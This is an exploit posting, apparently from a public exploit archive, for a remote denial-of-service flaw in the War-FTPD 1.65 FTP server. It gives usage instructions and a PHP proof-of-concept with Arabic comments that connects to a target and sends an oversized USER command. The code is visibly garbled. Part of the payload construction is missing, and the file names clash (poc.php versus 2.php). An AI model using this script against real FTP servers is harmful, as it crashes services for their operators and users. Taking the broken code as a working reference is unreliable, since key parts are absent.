============================================================================================================================================= | # Title : War-FTPD 1.65 Username - Denied of Service vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 136.0.0 (64 bits) | | # Vendor : https://tcls.tripod.com/warftpd.htm | ============================================================================================================================================= POC : [+] Dorking İn Google Or Other Search Enggine. [+] Code Description: War-FTPD version 1.65 remote denial of service exploit. (Related : https://packetstorm.news/files/id/176926/ Linked CVE numbers: ) . [+] save code as poc.php. [+] Usage = C:\www>php 2.php 127.0.0.1 21 [+] PayLoad : $buffer\n"; // إرسال طلب "USER" مع الحمولة fwrite($sock, "USER "); fwrite($sock, $exploit); // قراءة رد الخادم $buffer = fread($sock, 1024); echo "Authentication USER: $buffer\n"; fclose($sock); } // التحقق من المدخلات عبر POST أو GET if ($argc != 3) { echo "Usage: php script.php \n"; exit(1); } intro(); main_exploit($argv[1], $argv[2]); ?> Greetings to :===================================================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)| ===================================================================================================